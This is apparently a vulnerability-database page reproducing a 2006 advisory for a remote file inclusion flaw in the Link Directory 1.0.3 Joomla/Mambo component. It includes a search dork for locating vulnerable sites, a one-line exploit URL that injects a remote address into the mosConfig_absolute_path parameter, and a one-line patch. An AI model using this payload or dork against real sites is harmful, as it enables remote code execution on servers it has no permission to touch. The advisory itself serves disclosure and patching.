Link Directory - exploit.company

vendor:

Link Directory

by:

camino

3,3

CVSS

LOW

Remote File Inclusion

CWE

Product Name: Link Directory

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:mamboforge:link_directory

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Link Directory <= v1.0.3 (Mambo/Joomla CMS Component) Remote File Inclusion Vulnerability

Link Directory is a component to publish links. A remote file inclusion vulnerability exists in the toolbar.linkdirectory.html.php file of Link Directory version 1.0.3 and earlier. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter.

Mitigation:

Add the following line of code after line 8 in the toolbar.linkdirectory.html.php file: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

Source

Exploit-DB raw data:

    .:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: Link Directory <= v1.0.3

          (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Link Directory
 
  Version: <= 1.0.3
 
  Vulnerable File: toolbar.linkdirectory.html.php
 
  URL: http://www.sonerekici.com
 
  Description: It's a component to publish links.
 
  Dork: inurl:"com_linkdirectory"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open toolbar.linkdirectory.html.php
 
  o2.) add this after line 8:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) done!



 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]